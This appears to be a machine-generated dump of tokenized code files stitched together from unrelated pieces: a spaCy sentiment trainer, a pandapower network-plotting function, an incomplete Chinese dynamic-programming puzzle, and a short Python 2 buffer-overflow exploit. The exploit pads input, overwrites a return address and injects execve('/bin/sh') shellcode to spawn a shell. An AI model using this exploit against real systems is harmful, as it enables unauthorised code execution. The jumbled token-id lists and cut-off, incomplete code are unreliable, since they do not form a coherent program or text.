25)
[ 37811, 1273, 5620, 329, 2746, 21997, 28845, 2077, 422, 3740, 1378, 5305, 29412, 13, 785, 14, 34086, 3681, 12, 20930, 12, 29412, 8384, 329, 5698, 319, 599, 1590, 13, 198, 19608, 292, 316, 973, 318, 422, 3740, 1378, 1872, 13, 14192, 3841, 13, 15532, 14, 93, 1689, 292, 14, 7890, 14, 34086, 3681, 14, 198, 3500, 2196, 362, 13, 18, 13, 20, 286, 599, 1590, 355, 2196, 513, 3407, 40391, 2428, 618, 2111, 284, 779, 551, 1162, 3992, 895, 198, 37811, 198, 11748, 28686, 198, 6738, 4738, 1330, 36273, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 599, 1590, 198, 11748, 2298, 293, 198, 6738, 599, 1590, 13, 22602, 1330, 949, 571, 963, 11, 552, 9969, 198, 6738, 599, 1590, 13, 30001, 7509, 1330, 29130, 7509, 198, 6738, 599, 1590, 13, 79, 541, 4470, 1330, 41170, 928, 7509, 198, 11748, 269, 21370, 198, 198, 4299, 5794, 62, 34409, 62, 7890, 7, 67, 557, 66, 25, 965, 796, 366, 7890, 14, 34409, 14, 37779, 3546, 9945, 14, 27432, 4943, 4613, 6045, 25, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 8778, 82, 262, 3047, 1366, 422, 2393, 62, 34945, 290, 7000, 262, 1366, 656, 257, 2298, 293, 2393, 198, 220, 220, 220, 2141, 407, 1057, 611, 345, 423, 407, 15680, 290, 21242, 262, 3696, 422, 262, 41496, 13422, 13, 34586, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 8088, 796, 17635, 198, 220, 220, 220, 220, 198, 220, 220, 220, 1303, 356, 423, 257, 9483, 286, 3967, 8088, 290, 4633, 8088, 523, 880, 466, 734, 34820, 198, 220, 220, 220, 329, 3797, 287, 19203, 1930, 3256, 705, 12480, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 22378, 1123, 1981, 2423, 357, 27379, 2423, 318, 8574, 287, 663, 898, 2420, 2393, 8, 198, 220, 220, 220, 220, 220, 220, 220, 329, 2423, 62, 67, 557, 66, 287, 8106, 7, 50033, 474, 25, 474, 58, 12, 19, 47715, 855, 4458, 14116, 3256, 28686, 13, 4868, 15908, 7, 69, 6, 90, 67, 557, 66, 92, 14, 90, 9246, 92, 11537, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 1280, 7, 69, 6, 90, 67, 557, 66, 92, 14, 90, 9246, 92, 14, 90, 19023, 62, 67, 557, 66, 92, 3256, 21004, 2625, 49022, 12, 16, 4943, 355, 277, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2375, 504, 262, 2420, 290, 3797, 660, 7053, 4340, 340, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8088, 13, 33295, 19510, 69, 13, 961, 22446, 33491, 10786, 27, 1671, 11037, 3256, 374, 6, 59, 77, 59, 77, 27691, 36311, 22784, 1391, 6, 24619, 10354, 90, 6, 1930, 10354, 6, 1930, 6, 855, 9246, 4032, 12480, 10354, 6, 12480, 6, 855, 9246, 11709, 4008, 198, 220, 220, 220, 220, 198, 220, 220, 220, 351, 1280, 10786, 7890, 14, 34409, 14, 41364, 62, 19023, 82, 62, 7890, 13, 79, 41582, 3256, 705, 39346, 11537, 355, 277, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2298, 293, 13, 39455, 7, 19023, 82, 11, 277, 8, 628, 198, 4299, 36273, 62, 34409, 62, 7890, 7, 7890, 25, 1351, 11, 6626, 25, 493, 796, 764, 23, 8, 4613, 46545, 58, 4868, 5974, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 32299, 829, 262, 1366, 290, 31555, 340, 416, 6626, 287, 1502, 284, 423, 257, 220, 198, 220, 220, 220, 3047, 27039, 290, 257, 4856, 27039, 13, 15161, 318, 257, 604, 25, 16, 6626, 198, 220, 220, 220, 355, 7151, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 36273, 7, 7890, 8, 198, 220, 220, 220, 1441, 1366, 58, 600, 7, 11925, 7, 7890, 27493, 35312, 2599, 4357, 1366, 58, 25, 600, 7, 11925, 7, 7890, 27493, 35312, 15437, 628, 198, 4299, 5552, 62, 34409, 62, 7890, 7, 1477, 18137, 25, 20512, 796, 10352, 11, 19958, 66, 25, 965, 796, 705, 7890, 14, 34409, 14, 41364, 62, 19023, 82, 62, 7890, 13, 79, 41582, 11537, 4613, 46545, 58, 4868, 5974, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 8670, 641, 262, 8088, 8574, 287, 262, 2298, 293, 2393, 13, 198, 220, 220, 220, 1002, 36273, 318, 2081, 326, 1724, 326, 356, 815, 651, 262, 1366, 220, 198, 220, 220, 220, 3492, 416, 2491, 36273, 62, 34409, 62, 6601, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 351, 1280, 7, 67, 557, 66, 11, 705, 26145, 11537, 355, 277, 25, 198, 220, 220, 220, 220, 220, 220, 220, 8088, 796, 2298, 293, 13, 2220, 7, 69, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 1441, 36273, 62, 34409, 62, 7890, 7, 19023, 82, 8, 611, 36273, 2073, 46545, 7, 19023, 82, 8, 628, 198, 4299, 3613, 62, 19849, 7, 21283, 79, 11, 6436, 7509, 11, 3047, 62, 7890, 11, 1332, 62, 7890, 11, 8619, 25, 965, 28, 705, 27530, 14, 34086, 3681, 14, 19849, 62, 50179, 11537, 4613, 6045, 25, 198, 220, 220, 220, 37227, 82, 3080, 262, 1813, 2746, 37811, 628, 220, 220, 220, 351, 299, 34431, 13, 1904, 62, 37266, 7, 40085, 7509, 13, 8770, 1095, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 299, 34431, 13, 1462, 62, 39531, 7, 34945, 8, 198, 220, 220, 220, 220, 220, 220, 220, 3601, 7, 69, 1, 17633, 8858, 276, 284, 1391, 34945, 92, 4943, 628, 198, 4299, 4512, 62, 19849, 7, 34409, 62, 7890, 25, 1351, 58, 83, 29291, 4357, 1332, 62, 7890, 25, 1351, 58, 83, 29291, 4357, 954, 25, 493, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 833, 1299, 2746, 1813, 3047, 1366, 13, 6127, 4645, 2077, 422, 3740, 1378, 5305, 29412, 13, 785, 14, 34086, 3681, 12, 20930, 12, 29412, 198, 220, 220, 220, 19179, 547, 925, 2233, 284, 617, 9332, 2428, 11, 10061, 2438, 11, 290, 23572, 3544, 286, 23113, 290, 12782, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2482, 62, 14116, 796, 17635, 198, 220, 220, 220, 299, 34431, 796, 599, 1590, 13, 2220, 7203, 268, 62, 7295, 62, 12384, 62, 5796, 4943, 1303, 329, 551, 62, 7295, 62, 12384, 62, 5796, 10655, 2071, 11, 7347, 18, 2721, 25, 220, 198, 220, 220, 220, 1303, 3740, 1378, 12567, 13, 785, 14, 20676, 18442, 14, 2777, 1590, 12, 27530, 14, 260, 29329, 14, 15002, 14, 268, 62, 7295, 62, 12384, 62, 5796, 12, 17, 13, 17, 13, 15, 14, 268, 62, 7295, 62, 12384, 62, 5796, 12, 17, 13, 17, 13, 15, 13, 18870, 13, 34586, 628, 220, 220, 220, 1303, 17488, 928, 7509, 10314, 25, 3740, 1378, 2777, 1590, 13, 952, 14, 15042, 14, 24503, 928, 7509, 2, 2860, 62, 18242, 198, 220, 220, 220, 611, 366, 5239, 9246, 1, 407, 287, 299, 34431, 13, 34360, 62, 14933, 25, 198, 220, 220, 220, 220, 220, 220, 220, 299, 34431, 13, 2860, 62, 34360, 7, 21283, 79, 13, 17953, 62, 34360, 7203, 5239, 9246, 1600, 4566, 28, 4895, 998, 5712, 495, 1298, 366, 36439, 62, 66, 20471, 20662, 828, 938, 28, 17821, 8, 198, 220, 220, 220, 220, 198, 220, 220, 220, 2420, 9246, 796, 299, 34431, 13, 1136, 62, 34360, 7203, 5239, 9246, 4943, 198, 220, 220, 220, 220, 198, 220, 220, 220, 2420, 9246, 13, 2860, 62, 18242, 7203, 1930, 4943, 198, 220, 220, 220, 2420, 9246, 13, 2860, 62, 18242, 7203, 12480, 4943, 628, 220, 220, 220, 351, 1280, 10786, 27530, 14, 34086, 3681, 14, 27530, 14, 9288, 62, 7890, 13, 79, 41582, 3256, 705, 39346, 11537, 355, 277, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2298, 293, 13, 39455, 7, 9288, 62, 7890, 11, 277, 8, 628, 220, 220, 220, 1303, 2438, 284, 19607, 13894, 19860, 422, 3047, 198, 220, 220, 220, 351, 299, 34431, 13, 40223, 62, 79, 18636, 26933, 34360, 329, 12656, 287, 299, 34431, 13, 34360, 62, 14933, 611, 12656, 0, 2625, 5239, 9246, 8973, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 6436, 7509, 796, 299, 34431, 13, 27471, 62, 34409, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 15458, 62, 82, 4340, 796, 552, 9969, 7, 19, 13, 15, 11, 3933, 13, 15, 11, 352, 13, 8298, 8, 628, 198, 220, 220, 220, 220, 220, 220, 220, 329, 1312, 287, 2837, 7, 9127, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 36273, 7, 34409, 62, 7890, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 37830, 11, 2994, 796, 949, 571, 963, 7, 34409, 62, 7890, 11, 2546, 796, 15458, 62, 82, 4340, 828, 23884, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 15458, 287, 37830, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2420, 11, 14722, 796, 19974, 46491, 43501, 8, 1303, 15458, 318, 287, 262, 1296, 47527, 5239, 11, 18242, 15437, 523, 356, 19974, 9, 290, 651, 257, 1351, 329, 1123, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 299, 34431, 13, 19119, 7, 5239, 11, 14722, 11, 4268, 28, 13, 17, 11, 264, 21287, 28, 40085, 7509, 11, 9089, 796, 2994, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 2420, 9246, 13, 19849, 13, 1904, 62, 37266, 7, 40085, 7509, 13, 8770, 1095, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2482, 796, 13446, 62, 19849, 7, 21283, 79, 13, 30001, 7509, 11, 2420, 9246, 11, 1332, 62, 7890, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 256, 742, 62, 18351, 79, 796, 277, 6, 17633, 1303, 90, 72, 10, 16, 92, 14, 90, 9127, 38362, 39281, 25, 1391, 43420, 14692, 3866, 16005, 8973, 5512, 44536, 25, 1391, 43420, 14692, 8344, 439, 8973, 5512, 376, 12, 26595, 25, 1391, 43420, 14692, 69, 12, 26675, 8973, 5512, 2994, 29164, 22462, 14692, 5239, 9246, 8973, 92, 2637, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7, 14116, 62, 18351, 79, 11, 437, 11639, 705, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2482, 62, 14116, 13, 33295, 7, 14116, 62, 18351, 79, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3551, 62, 7890, 62, 1462, 62, 40664, 7, 43420, 11, 2994, 11, 1312, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 8820, 434, 284, 3613, 2746, 366, 12473, 47342, 46476, 26720, 22196, 5446, 21414, 22814, 12861, 20958, 19164, 3698, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3613, 62, 19849, 7, 21283, 79, 11, 6436, 7509, 11, 3047, 62, 7890, 11, 1332, 62, 7890, 11, 277, 1101, 375, 1424, 14, 34086, 3681, 14, 27530, 14, 19849, 90, 72, 10, 16, 92, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 351, 1280, 10786, 27530, 14, 34086, 3681, 14, 43420, 13, 14116, 3256, 705, 86, 11537, 355, 277, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1255, 287, 2482, 62, 14116, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 13, 13564, 7, 20274, 10, 6, 59, 77, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 4299, 13446, 62, 19849, 7, 30001, 7509, 25, 29130, 7509, 11, 2420, 9246, 25, 41170, 928, 7509, 11, 1332, 62, 7890, 25, 1351, 8, 4613, 8633, 25, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 13446, 262, 2746, 284, 766, 611, 340, 318, 24769, 284, 3613, 262, 2746, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2081, 62, 1930, 20288, 796, 2081, 62, 12480, 2929, 796, 220, 657, 198, 220, 220, 220, 3991, 62, 1930, 20288, 796, 3991, 62, 12480, 2929, 796, 352, 68, 12, 23, 220, 1303, 1474, 657, 284, 3368, 1220, 15, 32382, 2420, 9246, 13, 34360, 7, 30001, 7509, 7, 87, 58, 15, 12962, 737, 24619, 17816, 1930, 6, 4357, 198, 220, 220, 220, 16326, 11, 14722, 796, 19974, 46491, 8899, 7, 50033, 2124, 25, 357, 30001, 7509, 7, 87, 58, 15, 46570, 2124, 58, 16, 7131, 6, 24619, 20520, 828, 1332, 62, 7890, 4008, 198, 220, 220, 220, 329, 4776, 11, 2081, 62, 18242, 287, 19974, 26933, 72, 13, 24619, 17816, 1930, 20520, 329, 1312, 287, 2420, 9246, 13, 34360, 7, 83, 482, 641, 8, 4357, 14722, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 611, 4776, 18189, 657, 13, 20, 290, 2081, 62, 18242, 14692, 1930, 1, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2081, 62, 1930, 20288, 15853, 352, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 4776, 18189, 657, 13, 20, 290, 2081, 62, 18242, 14692, 12480, 1, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3991, 62, 1930, 20288, 15853, 352, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 4776, 1279, 657, 13, 20, 290, 2081, 62, 18242, 14692, 12480, 1, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2081, 62, 12480, 2929, 15853, 352, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 4776, 1279, 657, 13, 20, 290, 2081, 62, 18242, 14692, 1930, 1, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3991, 62, 12480, 2929, 15853, 352, 628, 220, 220, 220, 15440, 796, 2081, 62, 1930, 20288, 1220, 357, 7942, 62, 1930, 20288, 1343, 3991, 62, 1930, 20288, 8, 198, 220, 220, 220, 10014, 796, 2081, 62, 1930, 20288, 1220, 357, 7942, 62, 1930, 20288, 1343, 3991, 62, 12480, 2929, 8, 628, 220, 220, 220, 277, 62, 26675, 796, 362, 1635, 357, 3866, 16005, 1635, 10014, 8, 1220, 357, 3866, 16005, 1343, 10014, 8, 611, 15440, 1343, 10014, 2073, 657, 198, 220, 220, 220, 1441, 19779, 3866, 16005, 1298, 15440, 11, 366, 8344, 439, 1298, 10014, 11, 366, 69, 12, 26675, 1298, 277, 62, 26675, 92, 628, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 1303, 791, 23893, 284, 1005, 3201, 4981, 198, 220, 220, 220, 1303, 13954, 48778, 1137, 25, 2753, 2250, 290, 6993, 23156, 584, 3696, 198, 220, 220, 220, 1366, 796, 5552, 62, 34409, 62, 7890, 7, 17821, 8, 198, 220, 220, 220, 1303, 4512, 62, 19849, 7, 7890, 58, 15, 4357, 1366, 58, 16, 4357, 1679, 8, 198, 220, 220, 220, 220 ]
2.522996
2,457
#!/usr/bin/env python2 import struct padding = 'A'*28 #Address used with gdb #shellcode_addr = struct.pack("I", 0xffffd040) #Address used for exploit shellcode_addr = struct.pack("I", 0xffffd0b0) #Source: https://www.exploit-db.com/shellcodes/46809 #execve("/bin/sh", NULL, NULL) shellcode = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" exploit = padding + shellcode_addr + shellcode print exploit
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 17, 198, 11748, 2878, 198, 198, 39231, 796, 705, 32, 6, 9, 2078, 198, 198, 2, 20231, 973, 351, 308, 9945, 198, 2, 29149, 8189, 62, 29851, 796, 2878, 13, 8002, 7203, 40, 1600, 657, 87, 12927, 67, 36676, 8, 198, 198, 2, 20231, 973, 329, 14561, 198, 29149, 8189, 62, 29851, 796, 2878, 13, 8002, 7203, 40, 1600, 657, 87, 12927, 67, 15, 65, 15, 8, 198, 198, 2, 7416, 25, 3740, 1378, 2503, 13, 20676, 30711, 12, 9945, 13, 785, 14, 29149, 40148, 14, 3510, 34583, 198, 2, 18558, 303, 7203, 14, 8800, 14, 1477, 1600, 15697, 11, 15697, 8, 198, 29149, 8189, 796, 37082, 87, 3132, 59, 25306, 24, 59, 87, 21, 64, 59, 87, 15, 65, 59, 87, 3365, 59, 87, 4349, 59, 87, 3104, 59, 87, 17, 69, 59, 87, 17, 69, 59, 87, 4790, 59, 87, 3104, 59, 87, 3104, 59, 87, 17, 69, 59, 87, 5237, 59, 87, 3388, 59, 87, 21, 68, 59, 87, 4531, 59, 27705, 18, 59, 87, 10210, 59, 87, 1795, 1, 628, 198, 20676, 30711, 796, 24511, 1343, 7582, 8189, 62, 29851, 1343, 7582, 8189, 198, 198, 4798, 14561, 198 ]
2.215
200
""" 给定一个二维数组map,含义是一张地图,例如,如下矩阵: -2 -3 3 -5 -10 1 0 30 -5 游戏规则如下: (1)骑士从左上角出发,每次只能向右或者向下走,最后到达右下角见到公主。 (2)地图中每个位置的值代表骑士要遭遇的事情。如果是负数,说明此处有怪兽, 要让骑士掉血。如果是非负数,则代表此处有血瓶,能让骑士回血。 (3)骑士从左上角到右下角的过程中,走到任何一个位置,血量都不能少于1. 为了保证骑士能见到公主,初始血量至少是多少?根据map,返回初始血量。 """ if __name__ == '__main__': my_map = [[-2, -3, 3], [-5, -10, 1], [10, 30, -5]] print(DungenonGame.get_min_hp(my_map))
[ 37811, 198, 163, 119, 247, 22522, 248, 31660, 10310, 103, 12859, 234, 163, 119, 112, 46763, 108, 163, 119, 226, 8899, 171, 120, 234, 28938, 104, 20046, 231, 42468, 31660, 28156, 254, 28839, 108, 32368, 122, 171, 120, 234, 160, 122, 233, 36685, 224, 171, 120, 234, 36685, 224, 10310, 233, 163, 253, 102, 165, 246, 113, 171, 120, 248, 198, 12, 17, 532, 18, 513, 198, 12, 20, 532, 940, 352, 198, 15, 1542, 532, 20, 198, 198, 162, 116, 116, 22755, 237, 164, 100, 226, 26344, 247, 36685, 224, 10310, 233, 171, 120, 248, 198, 171, 120, 230, 16, 171, 120, 231, 165, 103, 39374, 20015, 236, 32432, 99, 41468, 164, 100, 240, 49035, 118, 20998, 239, 171, 120, 234, 162, 107, 237, 162, 105, 94, 20998, 103, 47797, 121, 28938, 239, 20998, 111, 22755, 244, 38519, 28938, 239, 10310, 233, 164, 113, 108, 171, 120, 234, 17312, 222, 28938, 236, 26344, 108, 164, 122, 122, 20998, 111, 10310, 233, 164, 100, 240, 164, 100, 223, 26344, 108, 17739, 105, 10310, 119, 16764, 198, 171, 120, 230, 17, 171, 120, 231, 28839, 108, 32368, 122, 40792, 162, 107, 237, 10310, 103, 19526, 235, 163, 121, 106, 21410, 161, 222, 120, 47987, 26193, 101, 165, 103, 39374, 17358, 223, 34402, 255, 34402, 229, 21410, 12859, 233, 46349, 227, 16764, 36685, 224, 162, 252, 250, 42468, 164, 112, 253, 46763, 108, 171, 120, 234, 46237, 112, 23626, 236, 29826, 97, 13783, 226, 17312, 231, 45250, 103, 17739, 121, 171, 120, 234, 198, 17358, 223, 164, 106, 102, 165, 103, 39374, 162, 236, 231, 26193, 222, 16764, 36685, 224, 162, 252, 250, 42468, 165, 251, 252, 164, 112, 253, 46763, 108, 171, 120, 234, 26344, 247, 47987, 26193, 101, 29826, 97, 13783, 226, 17312, 231, 26193, 222, 163, 241, 114, 171, 120, 234, 47797, 121, 164, 106, 102, 165, 103, 39374, 32368, 252, 26193, 222, 16764, 198, 171, 120, 230, 18, 171, 120, 231, 165, 103, 39374, 20015, 236, 32432, 99, 41468, 164, 100, 240, 26344, 108, 20998, 111, 10310, 233, 164, 100, 240, 21410, 32573, 229, 163, 101, 233, 40792, 171, 120, 234, 164, 113, 108, 26344, 108, 20015, 119, 19526, 243, 31660, 10310, 103, 19526, 235, 163, 121, 106, 171, 120, 234, 26193, 222, 34932, 237, 32849, 121, 38834, 47797, 121, 22887, 239, 12859, 236, 16, 13, 198, 198, 10310, 118, 12859, 228, 46479, 251, 46237, 223, 165, 103, 39374, 47797, 121, 164, 100, 223, 26344, 108, 17739, 105, 10310, 119, 171, 120, 234, 26344, 251, 34650, 233, 26193, 222, 34932, 237, 164, 229, 111, 22887, 239, 42468, 13783, 248, 22887, 239, 171, 120, 253, 43718, 117, 162, 235, 106, 8899, 171, 120, 234, 32573, 242, 32368, 252, 26344, 251, 34650, 233, 26193, 222, 34932, 237, 16764, 198, 37811, 628, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 616, 62, 8899, 796, 16410, 12, 17, 11, 532, 18, 11, 513, 4357, 25915, 20, 11, 532, 940, 11, 352, 4357, 685, 940, 11, 1542, 11, 532, 20, 11907, 198, 220, 220, 220, 3601, 7, 35, 2150, 268, 261, 8777, 13, 1136, 62, 1084, 62, 24831, 7, 1820, 62, 8899, 4008 ]
0.715909
528
# -*- coding: utf-8 -*- # Copyright (c) 2016-2018 by University of Kassel and Fraunhofer Institute for Energy Economics # and Energy System Technology (IEE), Kassel. All rights reserved. import pandas as pd from pandapower.plotting.generic_geodata import create_generic_coordinates from pandapower.plotting.plotly.traces import create_bus_trace, create_line_trace, create_trafo_trace, draw_traces, \ version_check from pandapower.plotting.plotly.get_colors import get_plotly_color_palette from pandapower.plotting.plotly.mapbox_plot import * from pandapower.topology import create_nxgraph, connected_components try: import pplog as logging except ImportError: import logging logger = logging.getLogger(__name__) def vlevel_plotly(net, respect_switches=True, use_line_geodata=None, colors_dict=None, on_map=False, projection=None, map_style='basic', figsize=1, aspectratio='auto', line_width=2, bus_size=10): """ Plots a pandapower network in plotly using lines/buses colors according to the voltage level they belong to. If no geodata is available, artificial geodata is generated. For advanced plotting see the tutorial INPUT: **net** - The pandapower format network. If none is provided, mv_oberrhein() will be plotted as an example OPTIONAL: **respect_switches** (bool, True) - Respect switches when artificial geodata is created **use_line_geodata** (bool, True) - defines if lines patches are based on net.line_geodata of the lines (True) or on net.bus_geodata of the connected buses (False) *colors_dict** (dict, None) - dictionary for customization of colors for each voltage level in the form: voltage_kv : color **on_map** (bool, False) - enables using mapbox plot in plotly If provided geodata are not real geo-coordinates in lon/lat form, on_map will be set to False. **projection** (String, None) - defines a projection from which network geo-data will be transformed to lat-long. For each projection a string can be found at http://spatialreference.org/ref/epsg/ **map_style** (str, 'basic') - enables using mapbox plot in plotly - 'streets' - 'bright' - 'light' - 'dark' - 'satellite' **figsize** (float, 1) - aspectratio is multiplied by it in order to get final image size **aspectratio** (tuple, 'auto') - when 'auto' it preserves original aspect ratio of the network geodata any custom aspectration can be given as a tuple, e.g. (1.2, 1) **line_width** (float, 1.0) - width of lines **bus_size** (float, 10.0) - size of buses to plot. """ version_check() # create geocoord if none are available if 'line_geodata' not in net: net.line_geodata = pd.DataFrame(columns=['coords']) if 'bus_geodata' not in net: net.bus_geodata = pd.DataFrame(columns=["x", "y"]) if len(net.line_geodata) == 0 and len(net.bus_geodata) == 0: logger.warning("No or insufficient geodata available --> Creating artificial coordinates." + " This may take some time") create_generic_coordinates(net, respect_switches=respect_switches) if on_map: logger.warning("Map plots not available with artificial coordinates and will be disabled!") on_map = False # check if geodata are real geographycal lat/lon coordinates using geopy if on_map and projection is not None: geo_data_to_latlong(net, projection=projection) # if bus geodata is available, but no line geodata if use_line_geodata is None: use_line_geodata = False if len(net.line_geodata) == 0 else True elif use_line_geodata and len(net.line_geodata) == 0: logger.warning("No or insufficient line geodata available --> only bus geodata will be used.") use_line_geodata = False # getting connected componenets without consideration of trafos graph = create_nxgraph(net, include_trafos=False) vlev_buses = connected_components(graph) # getting unique sets of buses for each voltage level vlev_bus_dict = {} for vl_buses in vlev_buses: if net.bus.loc[vl_buses, 'vn_kv'].unique().shape[0] > 1: logger.warning('buses from the same voltage level does not have the same vn_kv !?') vn_kv = net.bus.loc[vl_buses, 'vn_kv'].unique()[0] if vlev_bus_dict.get(vn_kv): vlev_bus_dict[vn_kv].update(vl_buses) else: vlev_bus_dict[vn_kv] = vl_buses # create a default colormap for voltage levels nvlevs = len(vlev_bus_dict) colors = get_plotly_color_palette(nvlevs) colors_dict = dict(zip(vlev_bus_dict.keys(), colors)) # creating traces for buses and lines for each voltage level bus_traces = [] line_traces = [] for vn_kv, buses_vl in vlev_bus_dict.items(): vlev_color = colors_dict[vn_kv] bus_trace_vlev = create_bus_trace(net, buses=buses_vl, size=bus_size, legendgroup=str(vn_kv), color=vlev_color, trace_name='buses {0} kV'.format(vn_kv)) if bus_trace_vlev is not None: bus_traces += bus_trace_vlev vlev_lines = net.line[net.line.from_bus.isin(buses_vl) & net.line.to_bus.isin(buses_vl)].index.tolist() line_trace_vlev = create_line_trace(net, lines=vlev_lines, use_line_geodata=use_line_geodata, respect_switches=respect_switches, legendgroup=str(vn_kv), color=vlev_color, width=line_width, trace_name='lines {0} kV'.format(vn_kv)) if line_trace_vlev is not None: line_traces += line_trace_vlev trafo_traces = create_trafo_trace(net, color='gray', width=line_width * 2) draw_traces(line_traces + trafo_traces + bus_traces, showlegend=True, aspectratio=aspectratio, on_map=on_map, map_style=map_style, figsize=figsize)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 2, 15069, 357, 66, 8, 1584, 12, 7908, 416, 2059, 286, 15035, 741, 290, 39313, 403, 71, 30288, 5136, 329, 6682, 18963, 198, 2, 290, 6682, 4482, 8987, 357, 40, 6500, 828, 15035, 741, 13, 1439, 2489, 10395, 13, 628, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 6738, 19798, 499, 789, 13, 29487, 889, 13, 41357, 62, 469, 375, 1045, 1330, 2251, 62, 41357, 62, 37652, 17540, 198, 6738, 19798, 499, 789, 13, 29487, 889, 13, 29487, 306, 13, 2213, 2114, 1330, 2251, 62, 10885, 62, 40546, 11, 2251, 62, 1370, 62, 40546, 11, 2251, 62, 9535, 6513, 62, 40546, 11, 3197, 62, 2213, 2114, 11, 3467, 198, 220, 220, 220, 2196, 62, 9122, 198, 6738, 19798, 499, 789, 13, 29487, 889, 13, 29487, 306, 13, 1136, 62, 4033, 669, 1330, 651, 62, 29487, 306, 62, 8043, 62, 18596, 5857, 198, 6738, 19798, 499, 789, 13, 29487, 889, 13, 29487, 306, 13, 8899, 3524, 62, 29487, 1330, 1635, 198, 6738, 19798, 499, 789, 13, 4852, 1435, 1330, 2251, 62, 77, 87, 34960, 11, 5884, 62, 5589, 3906, 198, 198, 28311, 25, 198, 220, 220, 220, 1330, 279, 489, 519, 355, 18931, 198, 16341, 17267, 12331, 25, 198, 220, 220, 220, 1330, 18931, 198, 6404, 1362, 796, 18931, 13, 1136, 11187, 1362, 7, 834, 3672, 834, 8, 628, 198, 4299, 410, 5715, 62, 29487, 306, 7, 3262, 11, 2461, 62, 2032, 9249, 28, 17821, 11, 779, 62, 1370, 62, 469, 375, 1045, 28, 14202, 11, 7577, 62, 11600, 28, 14202, 11, 319, 62, 8899, 28, 25101, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20128, 28, 14202, 11, 3975, 62, 7635, 11639, 35487, 3256, 2336, 7857, 28, 16, 11, 4843, 10366, 952, 11639, 23736, 3256, 1627, 62, 10394, 28, 17, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1323, 62, 7857, 28, 940, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1345, 1747, 257, 19798, 499, 789, 3127, 287, 7110, 306, 198, 220, 220, 220, 1262, 3951, 14, 65, 2664, 7577, 1864, 284, 262, 15004, 1241, 484, 5594, 284, 13, 198, 220, 220, 220, 1002, 645, 4903, 375, 1045, 318, 1695, 11, 11666, 4903, 375, 1045, 318, 7560, 13, 1114, 6190, 29353, 766, 262, 11808, 628, 220, 220, 220, 3268, 30076, 25, 198, 220, 220, 220, 220, 220, 220, 220, 12429, 3262, 1174, 532, 383, 19798, 499, 789, 5794, 3127, 13, 1002, 4844, 318, 2810, 11, 285, 85, 62, 2023, 81, 258, 259, 3419, 481, 307, 198, 220, 220, 220, 220, 220, 220, 220, 37515, 355, 281, 1672, 628, 220, 220, 220, 39852, 2849, 1847, 25, 198, 220, 